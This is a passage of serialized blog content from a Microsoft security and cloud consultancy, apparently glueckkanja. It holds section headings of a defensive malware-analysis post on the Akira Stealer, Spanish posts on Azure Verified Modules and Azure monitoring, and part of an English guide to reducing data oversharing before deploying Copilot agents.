grabFirefoxProfiles)",{"id":11007,"depth":329,"text":11008},{"id":11046,"depth":111,"text":11047},{"id":11378,"depth":111,"text":11379},{"id":11492,"depth":111,"text":11493},{"id":11820,"depth":111,"text":11821,"children":16868},[16869,16870,16871,16872,16873,16874],{"id":11829,"depth":329,"text":11830},{"id":11980,"depth":329,"text":11981},{"id":12086,"depth":329,"text":12087},{"id":12211,"depth":329,"text":12212},{"id":12278,"depth":329,"text":12279},{"id":12403,"depth":329,"text":12404},{"id":12508,"depth":111,"text":16876,"children":16877},"7.9. Discord and Telegram Token Theft (Class: Discord)",[16878,16879,16880,16881],{"id":12522,"depth":329,"text":12523},{"id":12653,"depth":329,"text":12654},{"id":12897,"depth":329,"text":12898},{"id":12978,"depth":329,"text":12979},{"id":13048,"depth":111,"text":13049,"children":16883},[16884,16886,16887,16888],{"id":13061,"depth":329,"text":16885},"7.10.1 Data Class Initialization",{"id":13159,"depth":329,"text":13160},{"id":13279,"depth":329,"text":13280},{"id":13344,"depth":329,"text":13345},{"id":13421,"depth":111,"text":16890,"children":16891},"7.11 File Grabber (Class: Utils.steal_files)",[16892,16893,16894,16895,16896,16897],{"id":13433,"depth":329,"text":13434},{"id":13504,"depth":329,"text":13505},{"id":13566,"depth":329,"text":13567},{"id":13599,"depth":329,"text":13600},{"id":13628,"depth":329,"text":13629},{"id":13807,"depth":329,"text":13808},{"id":13915,"depth":111,"text":13916,"children":16899},[16900,16901,16902,16903,16904],{"id":13924,"depth":329,"text":13925},{"id":13939,"depth":329,"text":13940},{"id":14018,"depth":329,"text":14019},{"id":14167,"depth":329,"text":14168},{"id":14400,"depth":329,"text":14401},{"id":14751,"depth":111,"text":14752},{"id":14782,"depth":111,"text":14783},{"id":14906,"depth":111,"text":14907},{"id":15017,"depth":111,"text":15018},{"id":15068,"depth":111,"text":15069},{"id":15245,"depth":111,"text":15246},{"id":15295,"depth":111,"text":15296},{"id":15339,"depth":111,"text":15340},{"id":15379,"depth":111,"text":15380},{"id":15470,"depth":111,"text":15471},{"id":15487,"depth":111,"text":15488},{"id":16010,"depth":111,"text":16011},{"id":16316,"depth":111,"text":16317},{"id":16437,"depth":111,"text":16438},{"id":16500,"depth":111,"text":16501},{"id":16672,"depth":111,"text":16673},{"lang":2257,"seoTitle":16922,"titleClass":2172,"date":16923,"categories":16924,"blogtitlepic":16925,"socialimg":16926,"customExcerpt":16927,"keywords":16928,"maxContent":2180,"asideNav":16929,"footer":16978,"contactInContent":16979,"published":2180,"hreflang":17010},"Akira Stealer: Technical Analysis of a Modular Info-Stealing Malware","2025-06-16",[2175],"head-quiet-breach.png","/blog/heads/head-quiet-breach.png","It started with a single Defender alert in Microsoft 365. No malware, no signatures, no panic. Just a whisper in the noise. What we uncovered was months of credential theft - surgical, silent, and nearly invisible. This is how our CSOC turned a quiet signal into a full-scale response. And gave our client back control before they even knew it was gone.","Microsoft 365 Security, Credential Theft Detection, Incident Response, Microsoft Defender, Managed Security Services, Cloud Security, Threat Detection, Cyber Attack Detection, CSOC, Advanced Threat Protection",{"menuItems":16930},[16931,16933,16936,16939,16942,16945,16948,16951,16954,16957,16960,16963,16966,16969,16972,16975],{"href":16932,"text":4575},"#prologue",{"href":16934,"text":16935},"#_1-initial-event-and-triage-summary","Initial Event and Triage Summary",{"href":16937,"text":16938},"#_2-malware-architecture-and-execution-chain-overview","Malware Architecture and Execution Chain Overview",{"href":16940,"text":16941},"#_3-deep-dive-updaterexe","Deep Dive: Updater.exe",{"href":16943,"text":16944},"#_4-deep-dive-powbat","Deep Dive: pow.bat",{"href":16946,"text":16947},"#_5-deep-dive-mainexe-electron-based-malware-loader","Deep Dive: main.exe",{"href":16949,"text":16950},"#_6-deep-dive-inputjs-the-encrypted-javascript-payload-loader","Deep Dive: input.js",{"href":16952,"text":16953},"#_7-deepdive-akira-stealer-v2-astorpy","DeepDive: Akira Stealer v2",{"href":16955,"text":16956},"#_8-circular-execution-chain-a-self-healing-loop","Circular Execution Chain",{"href":16958,"text":16959},"#_9-blockchain-tracking-and-analysis","Blockchain Tracking and Analysis",{"href":16961,"text":16962},"#_10-inside-the-akira-ecosystem-commercialized-cybercrime-infrastructure","Inside the Akira Ecosystem",{"href":16964,"text":16965},"#_11-akira-stealer-quickcheck-affected-files","Akira Stealer QuickCheck affected files",{"href":16967,"text":16968},"#_12-beyond-response-how-glueckkanja-csoc-turns-incidents-into-insights","How glueckkanja CSOC Turns Incidents into Insights",{"href":16970,"text":16971},"#_13-indicators-of-compromise-iocs","Indicators of Compromise (IOCs)",{"href":16973,"text":16974},"#_14-reflecting-on-the-akira-stealer-incident-strengthening-your-defense-with-glueckkanja-csoc","Reflecting on the Akira Stealer Incident",{"href":16976,"text":16977},"#_15-security-legal-disclaimer-use-of-real-malware-code","Security & Legal Disclaimer",{"noMargin":2180},{"quote":2167,"infos":16980},{"bgColor":3741,"color":2993,"boxBgColor":3742,"boxColor":2991,"headline":16981,"subline":16982,"level":41,"textStyling":2203,"flush":2204,"person":16983,"form":16990},"Get in touch now","As a leading Microsoft Security MSSP, we protect companies from cyber threats every day. Let´s talk and strengthen your cyber defenses together!",{"image":16984,"cloudinary":2180,"alt":16985,"name":16985,"detailsHeader":16986,"details":16987},"/people/people-pam-team.png","Project & Account Management","We look forward to hearing from you!",[16988,16989],{"text":2812,"href":2813,"details":3001,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2821,"cta":16991,"method":2168,"action":16992,"fields":16993},{"skin":2214},"/en/successful",[16994,16997,17000,17003,17006,17008,17009],{"label":16995,"type":61,"id":2219,"required":2180,"requiredMsg":16996},"Name*","Please enter your name.",{"label":16998,"type":61,"id":2223,"required":2180,"requiredMsg":16999},"Company*","Please enter your company.",{"label":17001,"type":2227,"id":2227,"required":2180,"requiredMsg":17002},"Email address*","Please enter your email address.",{"label":17004,"type":2236,"id":2237,"required":2180,"requiredMsg":17005},"Your data will be stored with us for the purpose of processing and responding to your inquiry. For more information on data protection, please refer to our \u003Ca href=\"/en/privacy\">Privacy Policy\u003C/a>.","Please confirm",{"type":2240,"id":2246,"value":17007},"Form: Blog MSSP 2025 | EN",{"type":2240,"id":2249,"value":2250},{"type":2240,"id":2252},[17011,17013],{"lang":2260,"href":17012},"/de/posts/2025-06-16-quiet-breach",{"lang":2257,"href":17014},"/en/posts/2025-06-16-quiet-breach","/posts/2025-06-16-quiet-breach",{"title":4568,"description":31},"posts/2025-06-16-quiet-breach",[17019,2268,2272,17020],"Microsoft 365 Defender","Incident Deep Dive","hrFoZQsecd8hWGrTtLDFNcg1Px0SS6jNQMld7gg-f2M",{"id":17023,"title":17024,"author":17025,"body":17026,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":17193,"moment":2165,"navigation":2180,"path":17223,"seo":17224,"stem":17225,"tags":17226,"webcast":2167,"__hash__":17230},"content_es/posts/2025-07-22-azure-certified-modules.md","Next Level Azure IaC: Azure Verified Modules",[2509],{"type":9,"value":17027,"toc":17186},[17028,17032,17034,17043,17046,17057,17060,17063,17071,17075,17077,17080,17083,17097,17100,17103,17107,17109,17112,17116,17118,17121,17124,17127,17147,17150,17158,17161,17165],[41,17029,17031],{"id":17030},"módulo-verificado-de-azure-iac-según-las-mejores-prácticas-de-microsoft","Módulo Verificado de Azure – IaC según las mejores prácticas de Microsoft",[12,17033,31],{},[12,17035,17036,17037,17042],{},"Microsoft se propuso enfrentar este desafío y lanzó los",[2630,17038,17041],{"href":17039,"rel":17040},"https://azure.github.io/Azure-Verified-Modules/",[3135],"Azure Verified Modules (AVM)",": un marco diseñado para desplegar recursos en Azure siguiendo las mejores prácticas.",[12,17044,17045],{},"Los AVM vienen en tres variantes bien definidas:",[1255,17047,17048,17051,17054],{},[1258,17049,17050],{},"Resource Modules – Implementación de un recurso específico en la nube.",[1258,17052,17053],{},"Pattern Modules – Implementación de una carga de trabajo predefinida.",[1258,17055,17056],{},"Utility Modules – Módulos auxiliares utilizados por Resource o Pattern Modules.",[12,17058,17059],{},"Para garantizar un estándar común, Microsoft estableció requisitos que todo nuevo recurso AVM debe cumplir. Esto aplica tanto a Terraform como a Bicep, el propio lenguaje IaC de Microsoft Azure.",[12,17061,17062],{},"Cada AVM tiene un responsable designado dentro de Microsoft que se encarga de su creación, mantenimiento y resolución de problemas.",[12,17064,17065,17066,17070],{},"Y, en un giro muy característico de la cultura open source, todos los módulos están disponibles bajo licencia MIT en los repositorios públicos de la ",[2630,17067,17069],{"href":17068},"https://github.com/Azure","Azure GitHub Organisation",". ¿Un módulo falla? ¿Falta un parámetro crítico? Cualquiera puede abrir un issue o contribuir directamente al desarrollo.",[41,17072,17074],{"id":17073},"cómo-empezar-con-avm","¿Cómo empezar con AVM?",[12,17076,31],{},[12,17078,17079],{},"Los AVM funcionan igual que cualquier otro módulo en Terraform o Bicep: se invocan de forma independiente y reciben los parámetros necesarios. Las directrices de AVM reducen estos parámetros al mínimo, allanando el camino para una adopción sin fricciones.",[12,17081,17082],{},"Ejemplo con Terraform:\nPara desplegar una máquina virtual con un disco de datos adicional, normalmente necesitas al menos estos recursos de Azure:",[1255,17084,17085,17088,17091,17094],{},[1258,17086,17087],{},"azurerm_windows_virtual_machine oder azurerm_linux_virtual_machine",[1258,17089,17090],{},"azurerm_network_interface",[1258,17092,17093],{},"azurerm_managed_disk",[1258,17095,17096],{},"azurerm_virtual_machine_data_disk_attachment\u003C",[12,17098,17099],{},"Cada uno de estos recursos exige parámetros recurrentes como el nombre del grupo de recursos, la región de destino o la propia denominación de los recursos.",[12,17101,17102],{},"Con AVM, todo ese entramado se reduce a una única llamada con los parámetros esenciales. El módulo se encarga del resto. Además, como los AVM ya integran las mejores prácticas de Microsoft, muchos valores vienen preconfigurados: TLS 1.2 habilitado por defecto o el bloqueo del acceso público son solo dos ejemplos claros.",[41,17104,17106],{"id":17105},"qué-hacer-si-no-existe-un-avm-para-mi-recurso","¿Qué hacer si no existe un AVM para mi recurso?",[12,17108,31],{},[12,17110,17111],{},"La licencia open source de AVM ofrece un camino claro: cualquiera puede iniciar su propio desarrollo basándose en este marco. Y si más adelante Microsoft decide crear un módulo oficial para ese recurso, tu trabajo previo puede convertirse en una contribución valiosa para toda la comunidad.",[41,17113,17115],{"id":17114},"gkvm-glueckkanja-️-open-source","GKVM - glueckkanja ❤️ Open Source",[12,17117,31],{},[12,17119,17120],{},"En glueckkanja seguimos exactamente este enfoque y apoyamos a nuestros clientes en el desarrollo de módulos basados en el framework AVM, los cuales posteriormente ponemos a disposición del público.",[12,17122,17123],{},"A estos módulos los llamamos GKVM (GlueckKanja Verified Modules), porque no solo cumplen con los lineamientos de AVM, sino que también incorporan el conocimiento que hemos acumulado en numerosos proyectos reales.",[12,17125,17126],{},"GKVM Resouce Modules:",[1255,17128,17129,17135,17141],{},[1258,17130,17131],{},[2630,17132,17134],{"href":17133},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-synapse-workspace/azurerm/latest","Azure Synapse Workspace",[1258,17136,17137],{},[2630,17138,17140],{"href":17139},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-iot-hub/azurerm/latest","Azure IoT Hub",[1258,17142,17143],{},[2630,17144,17146],{"href":17145},"https://registry.terraform.io/modules/glueckkanja/gkvm-res-messaging-eventgridsystemtopic/azurerm/latest","Azure Event Grid System Topic",[12,17148,17149],{},"GKVM Pattern Modules:",[1255,17151,17152],{},[1258,17153,17154],{},[2630,17155,17157],{"href":17156},"https://registry.terraform.io/modules/glueckkanja/gkvm-ptn-myworkid/azurerm/latest","My WorkId",[12,17159,17160],{},"¡Agradecemos cualquier issue que ayude a ampliar los módulos con nuevas funcionalidades!",[41,17162,17164],{"id":17163},"recursos-adicionales","Recursos adicionales",[1255,17166,17167,17173,17179],{},[1258,17168,17169],{},[2630,17170,17172],{"href":17171},"/es/azure/azure-foundation","glueckkanja Azure Foundation",[1258,17174,17175],{},[2630,17176,17178],{"href":17177},"/es/posts/2023-04-14-workload-management-with-azure-foundation","Azure Foundation: Cloud-Management eficiente con Terraform",[1258,17180,17181],{},[2630,17182,17185],{"href":17183,"rel":17184},"https://www.terraprovider.com/",[3135],"Terraform Provider for Microsoft 365",{"title":65,"searchDepth":111,"depth":111,"links":17187},[17188,17189,17190,17191,17192],{"id":17030,"depth":111,"text":17031},{"id":17073,"depth":111,"text":17074},{"id":17105,"depth":111,"text":17106},{"id":17114,"depth":111,"text":17115},{"id":17163,"depth":111,"text":17164},{"lang":2170,"seoTitle":17031,"titleClass":2172,"date":17194,"categories":17195,"blogtitlepic":17196,"socialimg":17197,"customExcerpt":17198,"keywords":17199,"contactInContent":17200,"hreflang":17216,"footer":17221,"scripts":17222},"2025-07-22",[3243],"head-azure-certified.png","/blog/heads/head-azure-certified.png","La infraestructura como código (IaC), especialmente con Terraform, es una pieza clave de nuestra Azure Foundation y un elemento esencial en toda transformación hacia la nube. Lo hemos visto una y otra vez: un uso estructurado de IaC no solo acelera la adopción de servicios en la nube, sino que también impulsa el desarrollo de nuevos productos. Y aquí surge la pregunta inevitable: ¿cuál es el mejor punto de partida?","Azure Verified Modules, AVM, Infrastructure as Code, IaC, Terraform, Bicep, Microsoft Best Practices, Azure Module Deployment, Azure Foundation, Open Source Azure, Azure IaC, Azure Automation",{"quote":2180,"infos":17201},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":17202,"form":17206},{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":17203},[17204,17205],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":17207,"method":2168,"action":2215,"fields":17208},{"skin":2214},[17209,17210,17211,17212,17213,17214,17215],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":2942},{"type":2240,"id":2249,"value":2944},{"type":2240,"id":2252},[17217,17219],{"lang":2257,"href":17218},"/en/posts/2025-07-22-azure-certified-modules",{"lang":2260,"href":17220},"/de/posts/2025-07-22-azure-certified-modules",{"noMargin":2180},{"slick":2180},"/posts/2025-07-22-azure-certified-modules",{"title":17024,"description":65},"posts/2025-07-22-azure-certified-modules",[17227,17228,17229,4074],"Infrastructure as Code","Azure Verified Modules","Terraform","-KnN-oo6aMEkfsfqlMlBcdrGKhiuBPjqfVc2fZhM1jo",{"id":17232,"title":17233,"author":17234,"body":17235,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":17337,"moment":2165,"navigation":2180,"path":17367,"seo":17368,"stem":17369,"tags":17370,"webcast":2167,"__hash__":17371},"content_es/posts/2025-08-27-azure-monitor.md","Monitorización que crece contigo – Soluciones orgánicas en Azure",[2543],{"type":9,"value":17236,"toc":17329},[17237,17241,17243,17246,17250,17252,17255,17272,17275,17279,17281,17284,17287,17290,17294,17296,17299,17302,17306,17308,17311,17314,17317,17320,17324,17326],[41,17238,17240],{"id":17239},"monitorización-en-azure","Monitorización en Azure",[12,17242,31],{},[12,17244,17245],{},"La monitorización en la nube es mucho más que solo recopilar métricas. En entornos dinámicos de Azure, se trata de capturar información relevante de manera dirigida, visualizarla de forma significativa y responder automáticamente. El enfoque no solo está en los aspectos técnicos, sino también en la escalabilidad, el control de costes y la gobernanza.",[41,17247,17249],{"id":17248},"monitorización-holística-con-azure-más-que-solo-métricas","Monitorización holística con Azure – Más que solo métricas",[12,17251,31],{},[12,17253,17254],{},"Un concepto moderno de monitorización en Azure incluye varios componentes:",[1255,17256,17257,17260,17263,17266,17269],{},[1258,17258,17259],{},"Azure Monitor como la plataforma central para métricas, registros y alertas",[1258,17261,17262],{},"Log Analytics para análisis en profundidad y correlación",[1258,17264,17265],{},"Application Insights para la monitorización de aplicaciones",[1258,17267,17268],{},"Workbooks y paneles para la visualización",[1258,17270,17271],{},"Action Groups y Logic Apps para respuestas automatizadas",[12,17273,17274],{},"La monitorización se vuelve especialmente valiosa cuando abarca no solo recursos nativos de la nube, sino también escenarios híbridos. Con Azure Arc, los sistemas locales y otras nubes pueden integrarse sin problemas, incluyendo registro, alertas y aplicación de políticas. Esto crea una vista coherente de toda la infraestructura.",[41,17276,17278],{"id":17277},"seguimiento-de-cambios-e-inventario-change-tracking-inventory","Seguimiento de cambios e inventario – Change Tracking & Inventory",[12,17280,31],{},[12,17282,17283],{},"Un aspecto a menudo subestimado de la monitorización es el seguimiento de los cambios en los recursos. Con Azure Change Tracking, los cambios de configuración en máquinas virtuales, archivos, entradas de registro e instalaciones de software pueden registrarse automáticamente y analizarse históricamente. Esto es especialmente útil para el análisis de la causa raíz de incidentes o para cumplir con requisitos de cumplimiento.",[12,17285,17286],{},"Esto se complementa con la función de Inventario, que proporciona una visión completa del software instalado, servicios en ejecución y configuraciones del sistema, tanto para máquinas virtuales de Azure como para sistemas locales integrados a través de Azure Arc. Esto crea una vista central del estado técnico del entorno, que puede integrarse perfectamente en las estructuras existentes de monitorización y gobernanza.",[12,17288,17289],{},"Combinado con Log Analytics y alertas automatizadas, Change Tracking se convierte en una herramienta poderosa para operaciones transparentes, análisis rápido de errores y documentación conforme.",[41,17291,17293],{"id":17292},"control-de-costos-mediante-registros-dirigidos","Control de costos mediante registros dirigidos",[12,17295,31],{},[12,17297,17298],{},"Un obstáculo común en la monitorización es el desarrollo de costos debido a registros no controlados. Azure ofrece varios niveles de Pricing Tiers con Log Analytics, lo que hace que la retención a largo plazo sea rentable. Al seleccionar períodos de retención y estrategias de muestreo adecuados, los costos pueden reducirse significativamente sin sacrificar información importante.",[12,17300,17301],{},"Un enfoque estructurado ayuda a diseñar el Logging de manera dirigida y eficiente. Azure Policy juega un papel clave aquí: con políticas predefinidas, la configuración de diagnóstico puede aplicarse automáticamente a los nuevos recursos. Esto garantiza la coherencia y reduce significativamente el esfuerzo manual.",[41,17303,17305],{"id":17304},"monitorización-como-servicio-gestionado","Monitorización como servicio gestionado",[12,17307,31],{},[12,17309,17310],{},"La monitorización efectiva comienza con una base estable y estructurada. En entornos de Azure, una Landing Zone proporciona la base necesaria para implementar la gobernanza, la seguridad y las operaciones de manera coherente. Esta base incluye no solo la infraestructura de red y la gestión de identidades, sino también un marco de monitorización bien pensado.",[12,17312,17313],{},"Nuestra Azure Foundation demuestra cómo puede funcionar esto: aporta un conjunto de alertas probadas, configuraciones de registro y controles de Azure Policy que garantizan que los nuevos recursos se configuren automáticamente con los ajustes correctos. Esto crea un entorno donde la transparencia y la seguridad operativa se consideran desde el principio.",[12,17315,17316],{},"Sobre esta base, se pueden proporcionar zonas de aplicaciones (App Zones) para aplicaciones específicas. Estas zonas son flexibles y pueden integrarse en la monitorización existente con alertas personalizadas y registros automatizados. Esto mantiene el entorno escalable y permite que crezca según los requisitos, sin perder visibilidad ni estandarización.",[12,17318,17319],{},"Esta estructura garantiza que la monitorización no solo sea técnicamente sólida, sino también estratégicamente escalable. Los estándares proporcionan coherencia, mientras que la modularidad permite requisitos individuales. Un servicio gestionado puede apoyarle asumiendo la operación, el mantenimiento y el desarrollo posterior. Esto crea libertad para centrarse en lo que realmente importa: su negocio principal, el desarrollo de productos o la optimización de procesos empresariales.",[41,17321,17323],{"id":17322},"conclusión","Conclusión",[12,17325,31],{},[12,17327,17328],{},"La monitorización moderna en Azure es un pilar clave para operaciones en la nube estables y seguras. Quienes se centran desde el principio en la estandarización, la automatización y el control de costos sientan las bases para la transparencia, la eficiencia y el crecimiento sostenible.",{"title":65,"searchDepth":111,"depth":111,"links":17330},[17331,17332,17333,17334,17335,17336],{"id":17239,"depth":111,"text":17240},{"id":17248,"depth":111,"text":17249},{"id":17277,"depth":111,"text":17278},{"id":17292,"depth":111,"text":17293},{"id":17304,"depth":111,"text":17305},{"id":17322,"depth":111,"text":17323},{"lang":2170,"seoTitle":17233,"titleClass":2172,"date":17338,"categories":17339,"blogtitlepic":17340,"socialimg":17341,"customExcerpt":17342,"keywords":17343,"contactInContent":17344,"hreflang":17360,"footer":17365,"scripts":17366},"2025-08-27",[3243],"head-azure-monitor.png","/blog/heads/head-azure-monitor.png","Cómo la monitorización moderna de Azure crea transparencia y deja espacio para lo que realmente importa","Azure Monitor, Microsoft Best Practices, Azure, Azure Foundation",{"quote":2180,"infos":17345},{"headline":2918,"subline":2919,"level":41,"textStyling":2203,"flush":2204,"person":17346,"form":17350},{"image":2921,"cloudinary":2180,"alt":2499,"name":2499,"quotee":2499,"quoteeTitle":2922,"quote":2923,"detailsHeader":2924,"details":17347},[17348,17349],{"text":2927,"href":2928,"details":2929,"icon":2815},{"text":2817,"href":2818,"icon":2819},{"ctaText":2212,"cta":17351,"method":2168,"action":2215,"fields":17352},{"skin":2214},[17353,17354,17355,17356,17357,17358,17359],{"label":2218,"type":61,"id":2219,"required":2180,"requiredMsg":2825},{"label":2936,"type":61,"id":2223,"required":2180,"requiredMsg":2827},{"label":2829,"type":2227,"id":2227,"required":2180,"requiredMsg":2830},{"label":2939,"type":2236,"id":2237,"required":2180,"requiredMsg":2940},{"type":2240,"id":2246,"value":2942},{"type":2240,"id":2249,"value":2944},{"type":2240,"id":2252},[17361,17363],{"lang":2260,"href":17362},"/de/posts/2025-08-27-azure-monitor",{"lang":2257,"href":17364},"/en/posts/2025-08-27-azure-monitor",{"noMargin":2180},{"slick":2180},"/posts/2025-08-27-azure-monitor",{"title":17233,"description":65},"posts/2025-08-27-azure-monitor",[17228,17229,4074],"K4SJtVy2dQvfNdhC4xQ4vZhyeKIyx5ebFFWrQl2_buY",{"id":17373,"title":17374,"author":17375,"body":17376,"cta":2165,"description":65,"eventid":2165,"extension":2166,"hideInRecent":2167,"layout":2168,"meta":18084,"moment":2165,"navigation":2180,"path":18146,"seo":18147,"stem":18148,"tags":18149,"webcast":2167,"__hash__":18154},"content_es/posts/2025-08-28-agent-ready-infrastructure.md","This is why you need a solid infrastructure to be agent-ready in 2025",[2524],{"type":9,"value":17377,"toc":18045},[17378,17380,17382,17388,17395,17399,17401,17404,17407,17412,17422,17429,17434,17443,17453,17471,17475,17477,17480,17484,17486,17489,17493,17495,17502,17506,17508,17519,17526,17528,17531,17551,17555,17557,17560,17564,17566,17573,17577,17579,17582,17586,17588,17599,17603,17605,17608,17612,17614,17617,17622,17636,17639,17642,17646,17648,17652,17654,17661,17664,17672,17680,17684,17686,17689,17695,17698,17703,17708,17712,17714,17721,17725,17727,17734,17742,17746,17748,17751,17754,17758,17760,17763,17766,17773,17777,17779,17782,17785,17790,17793,17796,17800,17802,17808,17811,17817,17820,17825,17829,17831,17890,17894,17896,17918,17922,17924,17927,17931,17933,17936,17940,17942,17949,17953,17955,17966,17973,17978,17981,17985,17987,17993,18000,18004,18007,18010,18014,18016,18019,18022,18026,18028,18031],[41,17379,4575],{"id":4574},[12,17381,31],{},[12,17383,17384,17385,1014],{},"With this omnipresence, many ideas and the desire to take action or at least experiment arise. At glueckkanja AG, we support our customers throughout this process. Of course, we are already developing and building agents, but in 80% of our projects, the primary focus is on preparing the data and tenant for agent creation. Before you implement Copilot productively in your organization, it's worthwhile to take a critical look at your infrastructure. When making decisions in this area, there are several important aspects to understand before deploying AI agents on a large scale. That’s why, in this blog post, I will guide you through the essential steps and differences. In a time when AI assistants like Microsoft 365 Copilot Agents promise to transform the working world, one principle holds true above all: ",[4328,17386,17387],{},"AI is only as good as the system beneath it",[12,17389,17390,17391,17394],{},"This comprehensive guide outlines ",[251,17392,17393],{},"how to prepare your data and infrastructure"," for Copilot Agents, covering key practices in SharePoint, Teams, and the Power Platform.",[41,17396,17398],{"id":17397},"why-your-infrastructure-data-matters","Why your infrastructure (data) matters",[12,17400,31],{},[12,17402,17403],{},"As we utilize AI agents, it is imperative to understand that these agents do not inherently possess knowledge about our organization, our data, or our unique operational context. By default, an AI agent only carries the built-in knowledge derived from the training of the Large Language Model (LLM). To effectively enhance and extend the capabilities of these AI agents, it is essential to systematically integrate various components. This enhancement can be achieved through the implementation of System Prompts, Knowledge Bases, Connectors, Web-Search functionalities, access to Microsoft Graph, Semantic Search, and additional tools. These components collectively enable the AI agents to deliver more precise, contextually relevant responses and actions, aligning closely with the specific needs and data of the organization. Since we are now in the very beginning of the agentic area, many of us will start with simple agents that source information based on existing SharePoint Online libraries.",[12,17405,17406],{},"For us in IT, that means we need to take care about our data in SharePoint Online more than ever!",[2109,17408,17409],{},[12,17410,17411],{},"SharePoint Online = Knowledge = Data and Data = Key",[12,17413,17414,17417,17418,17421],{},[251,17415,17416],{},"My clear message:"," Before adding AI copilots to your organization, ",[251,17419,17420],{},"get your data house in order",". The same data that feeds your Copilot Agents also feeds Microsoft 365 Copilot itself.",[12,17423,17424,17425,17428],{},"And not only that! Microsoft 365 Copilot is assessing the same data. *If that data is cluttered, overshared, or poorly secured, the AI could surface incorrect or sensitive information unexpectedly *or example, imagine asking Copilot about company structure and receiving details of a confidential reorganization plan you weren’t meant to see. Such incidents occur when content is ",[251,17426,17427],{},"overshared"," (available too broadly) on platforms like SharePoint or Teams. Note: Copilot respects all existing permissions, that means something like only can happen when permissions are misconfigured. Conversely, if data is siloed or inaccessible, AI assistants will be less useful.",[2109,17430,17431],{},[12,17432,17433],{},"Copilot only surfaces organizational data that the individual user has at least view permissions for!",[12,17435,17436,540,17439],{},[251,17437,17438],{},"Source:",[2630,17440,17441],{"href":17441,"rel":17442},"https://learn.microsoft.com/en-gb/copilot/microsoft-365/microsoft-365-copilot-privacy?azure-portal=true",[3135],[12,17444,17445,17448,17449,17452],{},[251,17446,17447],{},"Key takeaway:"," Enterprise AI succeeds only with a solid data foundation. A recent Microsoft report identifies ",[251,17450,17451],{},"data oversharing, data leakage, and noncompliant usage"," as top challenges to address before deploying AI. Organizations that invest in preparation of SharePoint Online and other data sources, will unlock Copilot’s benefits with confidence, while those who don’t risk security breaches or irrelevant AI outputs. Studies show about one-third of decision-makers lack full visibility into critical data.",[17454,17455,420,17456,420,17461,420,17464,420,17468],"picture",{},[17457,17458],"source",{"media":17459,"srcSet":17460},"(min-width: 992px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics.png",[17457,17462],{"media":17463,"srcSet":17460},"(min-width: 768px)",[17457,17465],{"media":17466,"srcSet":17467},"(min-width: 576px)","https://res.cloudinary.com/c4a8/image/upload/blog/pics/data-security-report-statistics-mob.png",[2772,17469],{"src":17467,"alt":17470},"Two statistics on data risks: 30% of decision-makers lack visibility into business-critical data (Visibility Gap) and 87% of security leaders reported a data breach in the past year (Data Breach Prevalence).",[41,17472,17474],{"id":17473},"_10-steps-to-improve-your-m365-data-infrastructure-now","10 steps to improve your M365 data infrastructure now",[12,17476,31],{},[12,17478,17479],{},"Now we know your agents will need data. As we as glueckkanja step in these projects, this is our typical 10-point list that we work from the top to end with our customers.",[186,17481,17483],{"id":17482},"step-1-check-core-sharing-settings","Step 1: Check Core Sharing Settings",[12,17485,47],{},[12,17487,17488],{},"Verify tenant-wide settings that could lead to oversharing. For example, scrutinize default link sharing policies (e.g. if “Anyone with the link” or “People in your organization” is allowed by default for SharePoint/OneDrive), whether users can create public Teams by default, and if your Power Platform environment is open without governance. Misconfigured defaults here are a common cause of unintentional broad access..",[186,17490,17492],{"id":17491},"step-2-audit-public-teams","Step 2: Audit Public Teams",[12,17494,47],{},[12,17496,17497,17498,17501],{},"Review any Microsoft Teams marked as “Public.” A public Team means ",[4328,17499,17500],{},"anyone in your organization"," can discover and access its content. Ensure that any Team set to public truly contains only non-sensitive, broadly suitable content. If not, switch it to private or adjust membership. (It’s easy for a Team to be created as Public and later forgotten, exposing files to all employees.)",[186,17503,17505],{"id":17504},"step-3-review-graph-connectors","Step 3: Review Graph Connectors",[12,17507,47],{},[12,17509,17510,17511,17514,17515,17518],{},"Check if your tenant has any ",[4328,17512,17513],{},"Microsoft Graph Connectors"," set up that pull in third-party data (e.g. from external file systems, wikis, etc.). Remove or secure any connector that indexes data not everyone should see. ",[251,17516,17517],{},"Why?"," Content indexed via Graph Connectors becomes part of your Microsoft Graph search index – meaning Copilot can potentially use it to answer prompts. You only want relevant, intended data sources connected.",[186,17520,17522,17523],{"id":17521},"step-4-generate-a-sharepoint-online-baseline-report","Step 4: Generate a ",[251,17524,17525],{},"SharePoint Online Baseline Report",[12,17527,47],{},[12,17529,17530],{},"SPO has different possible risks for unwanted data in Agents and Copilot. You need to look for different key metrics:",[1255,17532,17533,17536,17539,17542,17545,17548],{},[1258,17534,17535],{},"Broken Permission Inheritance on a folder-level",[1258,17537,17538],{},"Public SharePoint Sites",[1258,17540,17541],{},"Use of \"Everyone Except External Users\" or other dynamic group that contain all users",[1258,17543,17544],{},"Anyone Sharing Links",[1258,17546,17547],{},"Everyone-in-my-org Sharing Links",[1258,17549,17550],{},"Unwanted people in the Site Admins / Owners / Members / Visitors Group",[186,17552,17554],{"id":17553},"step-5-categorize-and-prioritize-risks","Step 5: Categorize and Prioritize Risks",[12,17556,47],{},[12,17558,17559],{},"Take the findings from Steps 1–4 and rank them by severity. Which sites or files carry the most business-critical or sensitive data and also have exposure risks? Prioritize fixing those. By layering business context (e.g., a site with financial data vs. a site with generic templates), you can focus on the most impactful issues first.",[186,17561,17563],{"id":17562},"step-6-involve-site-owners-for-access-reviews","Step 6: Involve Site Owners for Access Reviews",[12,17565,47],{},[12,17567,17568,17569,17572],{},"For each SharePoint site (or Team) highlighted as risky, have the site owner double-check who has access and if that is appropriate. Owners are typically closest to the content and can quickly spot “Oh, why does 